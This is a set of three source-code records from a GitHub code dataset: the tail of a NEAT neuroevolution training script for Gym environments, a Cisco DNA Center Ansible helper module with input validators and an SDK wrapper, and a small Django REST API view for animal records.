However, if we are using the score as part of the\n # fitness computation (`fitness_weight > 0`), then we always need to run this part.\n if config.gym_config.fitness_weight > 0 or self.generation % config.gym_config.new_episode_rate == 1:\n # Keep the episodes from the past two generations.\n num_to_keep = 2 * len(nets) * config.gym_config.num_fitness_episodes\n self.test_episodes = self.test_episodes[-num_to_keep:]\n self.simulate(nets, config.gym_config)\n print(f\"Simulation run time: {time.time() - t0:.2f}s\")\n t0 = time.time()\n\n if config.gym_config.reward_prediction_weight > 0.0:\n # Assign a composite fitness to each genome; genomes can make progress either\n # by improving their total reward or by making more accurate reward estimates.\n msg = f\"Evaluating {len(nets)} nets on {len(self.test_episodes)} test episodes\"\n jobs = [(genome, net, self.test_episodes, config.gym_config.reward_range,\n config.genome_config.use_reward_discount) for genome, net in nets]\n if self.pool:\n print(msg + f\", in parallel...\")\n results = self.pool.map(compute_reward_prediction_error, jobs)\n else:\n print(msg + \", serially...\")\n results = map(compute_reward_prediction_error, jobs)\n for i, pred_error in enumerate(results):\n genome = nets[i][0]\n if config.gym_config.fitness_weight > 0:\n genome.fitness = (config.gym_config.fitness_weight * genome.fitness -\n config.gym_config.reward_prediction_weight * pred_error)\n else:\n genome.fitness = -config.gym_config.reward_prediction_weight * pred_error\n\n print(f\"Reward prediction compute time: {time.time() - t0:.2f}s\\n\")\n\n # NOTE: This is a hack needed for running in batch mode in Slurm, because multiprocessing seems to prevent\n # automatic flushing.\n sys.stderr.flush()\n sys.stdout.flush()\n\n\ndef run_evolution(config, result_dir, proc=None):\n \"\"\"\n Run until the winner from a generation is able to solve the environment or the user interrupts the process.\n \"\"\"\n env = None\n pool = None\n stats = None\n best_genomes = None\n\n try:\n print(f'Creating Gym environment \"{config.gym_config.env_id}\".')\n env = gym.make(config.gym_config.env_id)\n num_proc = NUM_CORES if proc is None else proc\n if num_proc > 1:\n print(f\"Spawning a pool of {num_proc} processes.\")\n t0 = time.time()\n pool = multiprocessing.Pool(num_proc)\n print(f\"Time to create process pool: {time.time() - t0:.2f}s\", flush=True)\n else:\n pool = None\n ec = PooledErrorCompute(config.gym_config, pool)\n\n pop = neat.Population(config)\n stats = reporters.StatisticsReporter(pop)\n pop.add_reporter(stats)\n pop.add_reporter(neat.StdOutReporter(True))\n # Checkpoint every 25 generations or 900 seconds.\n pop.add_reporter(neat.Checkpointer(25, 900))\n\n steps_between_eval = config.gym_config.steps_between_eval\n\n while ec.generation < config.gym_config.max_steps:\n gen_best = pop.run(ec.evaluate_genomes, steps_between_eval)\n\n # print(gen_best)\n\n visualize.plot_fitness(stats, savepath=result_dir / \"fitness.svg\")\n visualize.plot_species(stats, savepath=result_dir / \"speciation.svg\")\n\n mfs = np.mean(stats.get_fitness_mean()[-steps_between_eval:])\n print(f\"Average mean fitness over last {steps_between_eval} generations: {mfs}\")\n mfs = np.mean(stats.get_fitness_stat(max)[-steps_between_eval:])\n print(f\"Average max fitness over last {steps_between_eval} generations: {mfs}\")\n\n # Evaluate the best genomes seen so far.\n best_genomes = stats.best_unique_genomes(config.gym_config.num_best)\n best_networks = [neat.nn.FeedForwardNetwork.create(g, 
config) for g in best_genomes]\n\n # If we want to evaluate as an ensemble, just make this a list of one list, so all networks are used\n # together in one ensemble.\n if config.gym_config.eval_ensemble:\n best_networks = [best_networks]\n\n solved = [True] * len(best_networks)\n for i, net in enumerate(best_networks):\n ensemble_text = f\" (ensemble of {len(net)} networks)\" if isinstance(net, list) else \"\"\n print(f\"Testing network {i}\" + ensemble_text + \"...\")\n scores = []\n for k in range(config.gym_config.num_evals):\n observation, _ = env.reset()\n score = 0\n step = 0\n done = False\n while not done:\n step += 1\n # Use the total reward estimates from all the best networks to\n # determine the best action given the current state.\n _, _, observation, reward, done, _ = take_step(env, observation, net)\n score += reward\n if not os.environ.get(\"HEADLESS\"):\n env.render()\n\n scores.append(score)\n avg_score = np.mean(scores)\n print(f\" Test Episode {k}: score = {score}, avg so far = {avg_score}\")\n if score < config.gym_config.score_threshold:\n # We must always get above the threshold, else stop early and decide we aren't solved yet.\n solved[i] = False\n break\n\n # NOTE: This is a hack needed for running in batch mode in Slurm, because multiprocessing seems to prevent\n # automatic flushing.\n sys.stderr.flush()\n sys.stdout.flush()\n\n if np.any(solved):\n msg = \"Solved by: \"\n for i, s in enumerate(solved):\n if s:\n msg += f\"winner-{best_networks[i]}, \"\n print(msg[:-2])\n return best_genomes\n\n # end while\n print(\"Reached maximum number of generations.\")\n\n except KeyboardInterrupt:\n print(\"User requested termination.\")\n\n finally:\n if stats:\n df = stats.to_pandas()\n if df is not None:\n df.to_pickle(result_dir / \"generations.pkl\")\n if env:\n env.close()\n if pool:\n pool.terminate()\n pool.join()\n\n return best_genomes\n\n\ndef main(argv=None):\n parser = argutils.create_parser(__doc__)\n argutils.add_experiment_args(parser)\n args = parser.parse_args(argv)\n argutils.resolve_experiment_args(parser, args, __file__)\n\n config = make_config(args.config)\n result_path = args.results_dir.resolve()\n result_path.mkdir(parents=True, exist_ok=True)\n print(f\"Using result path: {result_path}\")\n\n best_genomes = run_evolution(config, result_path, args.proc)\n\n # Save the winners.\n if best_genomes:\n print(f\"Saving the {len(best_genomes)} best genomes.\")\n for n, g in enumerate(best_genomes):\n name = f\"winner-{n}\"\n with open(result_path / f\"{name}.pkl\", \"wb\") as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, savepath=result_path / f\"{name}-net.gv\")\n visualize.draw_net(config, g, view=False, savepath=result_path / f\"{name}-net-pruned.gv\", prune_unused=True)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ntraft/synaptic-exuberance","sub_path":"gymex/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":13572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37932171815","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\ntry:\n from dnacentersdk import api, exceptions\nexcept ImportError:\n DNAC_SDK_IS_INSTALLED = False\nelse:\n DNAC_SDK_IS_INSTALLED = True\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.common import validation\nfrom abc import ABCMeta, abstractmethod\ntry:\n import logging\nexcept ImportError:\n LOGGING_IN_STANDARD = 
False\nelse:\n    LOGGING_IN_STANDARD = True\nimport os.path\nimport copy\nimport datetime\nimport inspect\n\n\nclass DnacBase():\n\n    \"\"\"Base class containing members which can be reused by all intent modules\"\"\"\n\n    __metaclass__ = ABCMeta\n\n    def __init__(self, module):\n        self.module = module\n        self.params = module.params\n        self.config = copy.deepcopy(module.params.get(\"config\"))\n        self.have = {}\n        self.want = {}\n        self.validated_config = []\n        self.msg = \"\"\n        self.status = \"success\"\n        dnac_params = self.get_dnac_params(self.params)\n        self.dnac = DNACSDK(params=dnac_params)\n        self.dnac_apply = {'exec': self.dnac._exec}\n        self.get_diff_state_apply = {'merged': self.get_diff_merged,\n                                     'deleted': self.get_diff_deleted,\n                                     'replaced': self.get_diff_replaced,\n                                     'overridden': self.get_diff_overridden,\n                                     'gathered': self.get_diff_gathered,\n                                     'rendered': self.get_diff_rendered,\n                                     'parsed': self.get_diff_parsed\n                                     }\n        self.dnac_log = dnac_params.get(\"dnac_log\")\n        log(str(dnac_params))  # NOTE: logs the connection params verbatim, including the password.\n        self.supported_states = [\"merged\", \"deleted\", \"replaced\", \"overridden\", \"gathered\", \"rendered\", \"parsed\"]\n        self.result = {\"changed\": False, \"diff\": [], \"response\": [], \"warnings\": []}\n\n    @abstractmethod\n    def validate_input(self):\n        pass\n\n    def get_diff_merged(self):\n        # Implement logic to merge the resource configuration\n        self.merged = True\n        return self\n\n    def get_diff_deleted(self):\n        # Implement logic to delete the resource\n        self.deleted = True\n        return self\n\n    def get_diff_replaced(self):\n        # Implement logic to replace the resource\n        self.replaced = True\n        return self\n\n    def get_diff_overridden(self):\n        # Implement logic to overwrite the resource\n        self.overridden = True\n        return self\n\n    def get_diff_gathered(self):\n        # Implement logic to gather data about the resource\n        self.gathered = True\n        return self\n\n    def get_diff_rendered(self):\n        # Implement logic to render a configuration template\n        self.rendered = True\n        return self\n\n    def get_diff_parsed(self):\n        # Implement logic to parse a configuration file\n        self.parsed = True\n        # Return self for consistency with the other get_diff_* handlers.\n        return self\n\n    def log(self, message, frameIncrement=0):\n        \"\"\"Log messages into the dnac.log file\"\"\"\n\n        if self.dnac_log:\n            message = \"Module: \" + self.__class__.__name__ + \", \" + message\n            log(message, (1 + frameIncrement))\n\n    def check_return_status(self):\n        \"\"\"Check the return status value and exit/fail the module accordingly\"\"\"\n\n        self.log(\"status: {0}, msg: {1}\".format(self.status, self.msg), frameIncrement=1)\n        if \"failed\" in self.status:\n            self.module.fail_json(msg=self.msg, response=[])\n        elif \"exited\" in self.status:\n            self.module.exit_json(**self.result)\n        elif \"invalid\" in self.status:\n            self.module.fail_json(msg=self.msg, response=[])\n
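\n    # Usage sketch (hypothetical, for illustration only): a concrete intent module\n    # sets self.status to one of \"success\", \"failed\", \"exited\" or \"invalid\" (the\n    # values inspected above) and then calls check_return_status(), e.g.:\n    #   self.status = \"failed\"\n    #   self.msg = \"Device not found\"  # hypothetical message\n    #   self.check_return_status()  # fails the Ansible run with self.msg\n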
\n    def get_dnac_params(self, params):\n        \"\"\"Store the DNAC connection parameters from the playbook\"\"\"\n\n        dnac_params = {\"dnac_host\": params.get(\"dnac_host\"),\n                       \"dnac_port\": params.get(\"dnac_port\"),\n                       \"dnac_username\": params.get(\"dnac_username\"),\n                       \"dnac_password\": params.get(\"dnac_password\"),\n                       \"dnac_verify\": params.get(\"dnac_verify\"),\n                       \"dnac_debug\": params.get(\"dnac_debug\"),\n                       \"dnac_log\": params.get(\"dnac_log\")\n                       }\n        return dnac_params\n\n    def get_task_details(self, task_id):\n        \"\"\"Check whether the performed task was successful\"\"\"\n\n        result = None\n        response = self.dnac_apply['exec'](\n            family=\"task\",\n            function=\"get_task_by_id\",\n            params={\"task_id\": task_id},\n        )\n\n        self.log(str(response))\n        if isinstance(response, dict):\n            result = response.get(\"response\")\n\n        return result\n\n    def reset_values(self):\n        \"\"\"Reset all necessary attributes to default values\"\"\"\n\n        self.have.clear()\n        self.want.clear()\n\n    def get_execution_details(self, execid):\n        \"\"\"\n        Get the execution details of an API\n\n        Parameters:\n            execid (str) - Id for API execution\n\n        Returns:\n            response (dict) - Status for API execution\n        \"\"\"\n\n        self.log(\"Execution Id \" + str(execid))\n        response = self.dnac._exec(\n            family=\"task\",\n            function='get_business_api_execution_details',\n            params={\"execution_id\": execid}\n        )\n        self.log(\"Response for the current execution: \" + str(response))\n        return response\n\n    def check_execution_response_status(self, response):\n        \"\"\"\n        Check the response status provided by the API in DNAC\n\n        Parameters:\n            response (dict) - API response\n\n        Returns:\n            self\n        \"\"\"\n\n        self.log(str(response))\n        if not response:\n            self.msg = \"response is empty\"\n            self.status = \"failed\"\n            return self\n\n        if not isinstance(response, dict):\n            self.msg = \"response is not a dictionary\"\n            self.status = \"failed\"\n            return self\n\n        executionid = response.get(\"executionId\")\n        # Poll until the execution reaches a terminal state (SUCCESS or an error).\n        while True:\n            execution_details = self.get_execution_details(executionid)\n            if execution_details.get(\"status\") == \"SUCCESS\":\n                self.result['changed'] = True\n                self.msg = \"Successfully executed\"\n                self.status = \"success\"\n                break\n\n            if execution_details.get(\"bapiError\"):\n                self.msg = execution_details.get(\"bapiError\")\n                self.status = \"failed\"\n                break\n\n        return self\n\n\ndef log(msg, frameIncrement=0):\n    with open('dnac.log', 'a') as of:\n        callerframerecord = inspect.stack()[1 + frameIncrement]\n        frame = callerframerecord[0]\n        info = inspect.getframeinfo(frame)\n        d = datetime.datetime.now().replace(microsecond=0).isoformat()\n        of.write(\"---- %s ---- %s@%s ---- %s \\n\" % (d, info.lineno, info.function, msg))\n\n\ndef is_list_complex(x):\n    return isinstance(x[0], dict) or isinstance(x[0], list)\n\n\ndef has_diff_elem(ls1, ls2):\n    return any((elem not in ls1 for elem in ls2))\n\n\ndef compare_list(list1, list2):\n    len_list1 = len(list1)\n    len_list2 = len(list2)\n    if len_list1 != len_list2:\n        return False\n\n    if len_list1 == 0:\n        return True\n\n    attempt_std_cmp = list1 == list2\n    if attempt_std_cmp:\n        return True\n\n    if not is_list_complex(list1) and not is_list_complex(list2):\n        return set(list1) == set(list2)\n\n    # For large lists of complex elements, fall back to the plain == comparison.\n    MAX_SIZE_CMP = 100\n    if len_list1 > MAX_SIZE_CMP:\n        return attempt_std_cmp\n    else:\n        # With equal lengths, treat the lists as equal when at least one direction\n        # has no differing element; generators let has_diff_elem fail fast.\n        return not (has_diff_elem(list1, list2)) or not (has_diff_elem(list2, list1))\n\n\ndef fn_comp_key(k, dict1, dict2):\n    return dnac_compare_equality(dict1.get(k), dict2.get(k))\n\n\ndef dnac_compare_equality(current_value, requested_value):\n    # A value of None on either side is treated as \"no change requested\".\n    if requested_value is None:\n        return True\n    if current_value is None:\n        return True\n    if isinstance(current_value, dict) and isinstance(requested_value, dict):\n        all_dict_params = list(current_value.keys()) + list(requested_value.keys())\n        return not any((not fn_comp_key(param, current_value, requested_value) for param in all_dict_params))\n    elif isinstance(current_value, list) and isinstance(requested_value, list):\n        return compare_list(current_value, requested_value)\n    else:\n        return current_value == requested_value\n
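\n\n# Illustration of the comparison semantics above (hypothetical values):\n#   dnac_compare_equality({\"a\": 1, \"b\": 2}, {\"a\": 1}) -> True, because a requested\n#   value of None (key \"b\" is absent from the request) means \"no change requested\".\n#   dnac_compare_equality({\"a\": 1}, {\"a\": 2}) -> False.\n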
\n\ndef simple_cmp(obj1, obj2):\n    return obj1 == obj2\n\n\ndef get_dict_result(result, key, value, cmp_fn=simple_cmp):\n    # Search `result` (a dict, or a list of dicts) for the entry whose `key` matches `value`.\n    if isinstance(result, list):\n        if len(result) == 1:\n            if isinstance(result[0], dict):\n                result = result[0]\n                if result.get(key) is not None and result.get(key) != value:\n                    result = None\n            else:\n                result = None\n        else:\n            for item in result:\n                if isinstance(item, dict) and (item.get(key) is None or item.get(key) == value):\n                    result = item\n                    return result\n            result = None\n    elif not isinstance(result, dict):\n        result = None\n    elif result.get(key) is not None and result.get(key) != value:\n        result = None\n    return result\n\n\ndef dnac_argument_spec():\n    argument_spec = dict(\n        dnac_host=dict(type=\"str\", required=True),\n        dnac_port=dict(type=\"int\", required=False, default=443),\n        dnac_username=dict(type=\"str\", default=\"admin\", aliases=[\"user\"]),\n        dnac_password=dict(type=\"str\", no_log=True),\n        dnac_verify=dict(type=\"bool\", default=True),\n        dnac_version=dict(type=\"str\", default=\"2.2.3.3\"),\n        dnac_debug=dict(type=\"bool\", default=False),\n        validate_response_schema=dict(type=\"bool\", default=True),\n    )\n    return argument_spec\n\n\ndef validate_str(item, param_spec, param_name, invalid_params):\n    \"\"\"\n    This function checks that the input `item` is a valid string and conforms to\n    the constraints specified in `param_spec`. If the string is not valid or does\n    not meet the constraints, an error message is added to `invalid_params`.\n\n    Args:\n        item (str): The input string to be validated.\n        param_spec (dict): The parameter's specification, including validation constraints.\n        param_name (str): The name of the parameter being validated.\n        invalid_params (list): A list to collect validation error messages.\n\n    Returns:\n        str: The validated and possibly normalized string.\n\n    Example `param_spec`:\n    {\n        \"type\": \"str\",\n        \"length_max\": 255  # Optional: maximum allowed length\n    }\n    \"\"\"\n\n    item = validation.check_type_str(item)\n    if param_spec.get(\"length_max\"):\n        if 1 <= len(item) <= param_spec.get(\"length_max\"):\n            return item\n        else:\n            invalid_params.append(\n                \"{0}: {1} : The string length is outside the allowed \"\n                \"range of 1 to {2} characters\".format(param_name, item, param_spec.get(\"length_max\"))\n            )\n    return item\n
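\n\n# Hypothetical usage of validate_str (not part of the original module):\n#   errs = []\n#   validate_str(\"BLDG-12\", {\"type\": \"str\", \"length_max\": 32}, \"site_name\", errs)\n#   -> returns \"BLDG-12\" and leaves errs empty; a longer value would append an\n#   error message to errs instead.\n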
\n\ndef validate_int(item, param_spec, param_name, invalid_params):\n    \"\"\"\n    This function checks that the input `item` is a valid integer and conforms to\n    the constraints specified in `param_spec`. If the integer is not valid or does\n    not meet the constraints, an error message is added to `invalid_params`.\n\n    Args:\n        item (int): The input integer to be validated.\n        param_spec (dict): The parameter's specification, including validation constraints.\n        param_name (str): The name of the parameter being validated.\n        invalid_params (list): A list to collect validation error messages.\n\n    Returns:\n        int: The validated integer.\n\n    Example `param_spec`:\n    {\n        \"type\": \"int\",\n        \"range_min\": 1,   # Optional: minimum allowed value\n        \"range_max\": 100  # Optional: maximum allowed value\n    }\n    \"\"\"\n\n    item = validation.check_type_int(item)\n    min_value = 1\n    if param_spec.get(\"range_min\") is not None:\n        min_value = param_spec.get(\"range_min\")\n    if param_spec.get(\"range_max\"):\n        if min_value <= item <= param_spec.get(\"range_max\"):\n            return item\n        else:\n            invalid_params.append(\n                \"{0}: {1} : The integer is outside the allowed \"\n                \"range of {2} to {3}\".format(param_name, item, min_value, param_spec.get(\"range_max\"))\n            )\n    return item\n\n\ndef validate_bool(item, param_spec, param_name, invalid_params):\n    \"\"\"\n    This function checks that the input `item` is a valid boolean value. If it does\n    not represent a valid boolean value, an error message is added to `invalid_params`.\n\n    Args:\n        item (bool): The input boolean value to be validated.\n        param_spec (dict): The parameter's specification, including validation constraints.\n        param_name (str): The name of the parameter being validated.\n        invalid_params (list): A list to collect validation error messages.\n\n    Returns:\n        bool: The validated boolean value.\n    \"\"\"\n\n    return validation.check_type_bool(item)\n
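\n\n# Hypothetical usage of the two validators above (not part of the original module):\n#   errs = []\n#   validate_int(443, {\"type\": \"int\", \"range_min\": 1, \"range_max\": 65535}, \"dnac_port\", errs)\n#   -> returns 443 and leaves errs empty; 0 or 70000 would append an error message.\n#   validate_bool(True, {\"type\": \"bool\"}, \"dnac_verify\", errs) -> returns True.\n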
\n\ndef validate_list(item, param_spec, param_name, invalid_params):\n    \"\"\"\n    This function checks if the input `item` is a valid list based on the specified `param_spec`.\n    It also verifies that the elements of the list match the expected data type specified in the\n    `param_spec`. If any validation errors occur, they are appended to the `invalid_params` list.\n\n    Args:\n        item (list): The input list to be validated.\n        param_spec (dict): The parameter's specification, including validation constraints.\n        param_name (str): The name of the parameter being validated.\n        invalid_params (list): A list to collect validation error messages.\n\n    Returns:\n        list: The validated list, potentially normalized based on the specification.\n    \"\"\"\n\n    try:\n        if param_spec.get(\"type\") == type(item).__name__:\n            keys_list = list(param_spec)\n            if len(keys_list) == 1:\n                # Only a \"type\" constraint was given; a plain type check suffices.\n                return validation.check_type_list(item)\n\n            temp_dict = {keys_list[1]: param_spec[keys_list[1]]}\n            try:\n                if param_spec['elements']:\n                    get_spec_type = param_spec['type']\n                    get_spec_element = param_spec['elements']\n                    if type(item).__name__ == get_spec_type:\n                        for element in item:\n                            if type(element).__name__ != get_spec_element:\n                                invalid_params.append(\n                                    \"{0} is not of the expected data type {1}\".format(element, get_spec_element)\n                                )\n                    else:\n                        invalid_params.append(\n                            \"{0} is not of the expected data type {1}\".format(item, get_spec_type)\n                        )\n            except KeyError:\n                # No 'elements' constraint: treat the item as a list of dicts and\n                # validate it recursively against the remaining spec.\n                item, list_invalid_params = validate_list_of_dicts(item, temp_dict)\n                invalid_params.extend(list_invalid_params)\n        else:\n            invalid_params.append(\"{0} : is not a valid list\".format(item))\n    except Exception as e:\n        invalid_params.append(\"{0} : exception raised while validating the list\".format(e))\n\n    return item\n\n\ndef validate_dict(item, param_spec, param_name, invalid_params):\n    \"\"\"\n    This function checks if the input `item` is a valid dictionary based on the specified `param_spec`.\n    If the dictionary does not match the expected data type specified in the `param_spec`,\n    a validation error is appended to the `invalid_params` list.\n\n    Args:\n        item (dict): The input dictionary to be validated.\n        param_spec (dict): The parameter's specification, including validation constraints.\n        param_name (str): The name of the parameter being validated.\n        invalid_params (list): A list to collect validation error messages.\n\n    Returns:\n        dict: The validated dictionary.\n    \"\"\"\n\n    if param_spec.get(\"type\") != type(item).__name__:\n        invalid_params.append(\"{0} : is not a valid dictionary\".format(item))\n    return validation.check_type_dict(item)\n
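\n\n# Hypothetical example for the two validators above (not from the original module):\n#   errs = []\n#   validate_list([1, 2, 3], {\"type\": \"list\", \"elements\": \"int\"}, \"vlan_ids\", errs)\n#   -> returns [1, 2, 3]; a string element would be reported in errs.\n#   validate_dict({\"a\": 1}, {\"type\": \"dict\"}, \"payload\", errs) -> returns {\"a\": 1}.\n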
\n\ndef validate_list_of_dicts(param_list, spec, module=None):\n    \"\"\"Validate/normalize playbook params. Raises when a no_log parameter is\n    encountered without an Ansible module object.\n    param_list: a playbook parameter list of dicts\n    spec: an argument spec dict\n          e.g. spec = dict(ip=dict(required=True, type='bool'),\n                      foo=dict(type='str', default='bar'))\n    return: list of normalized input data and a list of validation error messages\n    \"\"\"\n\n    normalized = []\n    invalid_params = []\n\n    for list_entry in param_list:\n        valid_params_dict = {}\n        if not spec:\n            # Handle the case when the spec is empty but the param list is not.\n            invalid_params.append(\"No more spec to validate, but parameters remain\")\n            break\n        for param in spec:\n            item = list_entry.get(param)\n            log(str(item))\n            if item is None:\n                if spec[param].get(\"required\"):\n                    invalid_params.append(\n                        \"{0} : Required parameter not found\".format(param)\n                    )\n                else:\n                    item = spec[param].get(\"default\")\n                    valid_params_dict[param] = item\n                    continue\n            data_type = spec[param].get(\"type\")\n            # Dispatch to the validator matching the declared data type.\n            switch = {\n                \"str\": validate_str,\n                \"int\": validate_int,\n                \"bool\": validate_bool,\n                \"list\": validate_list,\n                \"dict\": validate_dict,\n            }\n\n            validator = switch.get(data_type)\n            if validator:\n                item = validator(item, spec[param], param, invalid_params)\n            else:\n                invalid_params.append(\n                    \"{0}:{1} : Unsupported data type {2}.\".format(param, item, data_type)\n                )\n\n            choice = spec[param].get(\"choices\")\n            if choice:\n                if item not in choice:\n                    invalid_params.append(\n                        \"{0} : Invalid choice provided\".format(item)\n                    )\n\n            no_log = spec[param].get(\"no_log\")\n            if no_log:\n                if module is not None:\n                    module.no_log_values.add(item)\n                else:\n                    msg = \"\\n\\n'{0}' is a no_log parameter\".format(param)\n                    msg += \"\\nAnsible module object must be passed to this \"\n                    msg += \"\\nfunction to ensure it is not logged\\n\\n\"\n                    raise Exception(msg)\n\n            valid_params_dict[param] = item\n        normalized.append(valid_params_dict)\n\n    return normalized, invalid_params\n\n\nclass DNACSDK(object):\n    def __init__(self, params):\n        self.result = dict(changed=False, result=\"\")\n        self.validate_response_schema = params.get(\"validate_response_schema\")\n        if DNAC_SDK_IS_INSTALLED:\n            self.api = api.DNACenterAPI(\n                username=params.get(\"dnac_username\"),\n                password=params.get(\"dnac_password\"),\n                base_url=\"https://{dnac_host}:{dnac_port}\".format(\n                    dnac_host=params.get(\"dnac_host\"), dnac_port=params.get(\"dnac_port\")\n                ),\n                version=params.get(\"dnac_version\"),\n                verify=params.get(\"dnac_verify\"),\n                debug=params.get(\"dnac_debug\"),\n            )\n            if params.get(\"dnac_debug\") and LOGGING_IN_STANDARD:\n                logging.getLogger('dnacentersdk').addHandler(logging.StreamHandler())\n        else:\n            self.fail_json(msg=\"DNA Center Python SDK is not installed. Execute 'pip install dnacentersdk'\")
\n\n    def changed(self):\n        self.result[\"changed\"] = True\n\n    def object_created(self):\n        self.changed()\n        self.result[\"result\"] = \"Object created\"\n\n    def object_updated(self):\n        self.changed()\n        self.result[\"result\"] = \"Object updated\"\n\n    def object_deleted(self):\n        self.changed()\n        self.result[\"result\"] = \"Object deleted\"\n\n    def object_already_absent(self):\n        self.result[\"result\"] = \"Object already absent\"\n\n    def object_already_present(self):\n        self.result[\"result\"] = \"Object already present\"\n\n    def object_present_and_different(self):\n        self.result[\"result\"] = \"Object already present, but it has different values from the requested ones\"\n\n    def object_modify_result(self, changed=None, result=None):\n        if result is not None:\n            self.result[\"result\"] = result\n        if changed:\n            self.changed()\n\n    def is_file(self, file_path):\n        return os.path.isfile(file_path)\n\n    def extract_file_name(self, file_path):\n        return os.path.basename(file_path)\n\n    def _exec(self, family, function, params=None, op_modifies=False, **kwargs):\n        try:\n            family = getattr(self.api, family)\n            func = getattr(family, function)\n        except Exception as e:\n            self.fail_json(msg=to_native(e))\n\n        try:\n            if params:\n                file_paths_params = kwargs.get('file_paths', [])\n                # This substitution is for the import file operation\n                if file_paths_params and isinstance(file_paths_params, list):\n                    multipart_fields = {}\n                    for (key, value) in file_paths_params:\n                        if isinstance(params.get(key), str) and self.is_file(params[key]):\n                            file_name = self.extract_file_name(params[key])\n                            file_path = params[key]\n                            multipart_fields[value] = (file_name, open(file_path, 'rb'))\n\n                    params.setdefault(\"multipart_fields\", multipart_fields)\n                    params.setdefault(\"multipart_monitor_callback\", None)\n\n                if not self.validate_response_schema and op_modifies:\n                    params[\"active_validation\"] = False\n\n                response = func(**params)\n            else:\n                response = func()\n        except exceptions.dnacentersdkException as e:\n            self.fail_json(\n                msg=(\n                    \"An error occurred while executing the operation.\"\n                    \" The error was: {error}\"\n                ).format(error=to_native(e))\n            )\n        return response\n\n    def fail_json(self, msg, **kwargs):\n        self.result.update(**kwargs)\n        raise Exception(msg)\n\n    def exit_json(self):\n        return self.result\n\n\ndef main():\n    pass\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"cisco-en-programmability/dnacenter-ansible","sub_path":"plugins/module_utils/dnac.py","file_name":"dnac.py","file_ext":"py","file_size_in_byte":23003,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"15831524641","text":"from rest_framework.views import APIView, Request, Response, status\n\nfrom animals.models import Animal\nfrom animals.serializers import AnimalSerializer\n\n\nclass AnimalView(APIView):\n    def get(self, _: Request):\n        animals = Animal.objects.all()\n        serialized = AnimalSerializer(instance=animals, many=True)\n\n        return Response({\"animals\": serialized.data}, status.HTTP_200_OK)\n\n    def post(self, req: Request):\n        serialized = AnimalSerializer(data=req.data)\n        print(\"before validating\", serialized)\n        serialized.is_valid(raise_exception=True)\n        serialized.save()\n\n        return Response(serialized.data, status.HTTP_201_CREATED)\n\n\nclass AnimalIdView(APIView):\n    def get(self, _: Request, animal_id):\n        try:\n            animal = Animal.objects.get(id=animal_id)\n            serialized = AnimalSerializer(instance=animal)\n\n            return Response({\"animal\": serialized.data}, 
status.HTTP_200_OK)\n        except Animal.DoesNotExist:\n            # Catch the specific \"missing object\" error rather than a bare except,\n            # so unrelated errors are not masked as a 404.\n            return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)\n\n    def patch(self, req: Request, animal_id):\n        try:\n            animal = Animal.objects.get(id=animal_id)\n            serialized = AnimalSerializer(animal, req.data, partial=True)\n            # Validate before saving; otherwise invalid payloads would be persisted.\n            serialized.is_valid(raise_exception=True)\n\n            serialized.save()\n\n            return Response({\"animal\": serialized.data}, status.HTTP_200_OK)\n        except ValueError as err:\n            # Pass through the ValueError args (assumed to carry a response body and status).\n            return Response(*err.args)\n        except Animal.DoesNotExist:\n            return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)\n\n    def delete(self, _: Request, animal_id):\n        try:\n            animal = Animal.objects.get(id=animal_id)\n            animal.delete()\n\n            return Response(\"\", status.HTTP_204_NO_CONTENT)\n        except Animal.DoesNotExist:\n            return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)","repo_name":"Kenzie-Academy-Brasil-Developers/m5-sprint3-kenzie-pet-Kurein","sub_path":"animals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}